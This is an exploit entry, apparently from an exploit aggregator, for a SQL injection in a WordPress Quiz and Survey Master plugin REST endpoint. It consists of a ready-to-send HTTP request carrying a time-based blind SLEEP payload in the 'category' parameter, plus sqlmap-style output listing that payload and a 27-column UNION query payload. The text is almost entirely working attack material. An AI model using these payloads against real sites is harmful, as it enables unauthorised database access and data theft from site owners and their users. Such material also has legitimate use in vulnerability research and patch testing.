## https://sploitus.com/exploit?id=WPEX-ID:EE90F784-F17B-4268-9443-8F29E58D2EE1
GET /wp-json/quiz-survey-master/v1/bank_questions/1?category=a'%20AND%20(SELECT%201950%20FROM%20(SELECT(SLEEP(5)))ckOq)--%20IYpy HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-WP-Nonce: 2d1236068d
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [account with edit_post capability (author+)]


---
Parameter: category (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category=a' AND (SELECT 1950 FROM (SELECT(SLEEP(5)))ckOq)-- IYpy

    Type: UNION query
    Title: Generic UNION query (NULL) - 27 columns
    Payload: category=a' UNION ALL SELECT NULL,NULL,CONCAT(0x71767a7871,0x4c65426b7873415142526c6e6c726a61504b4976786f5a7850744a6a78527a69667a486964675262,0x7176786271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -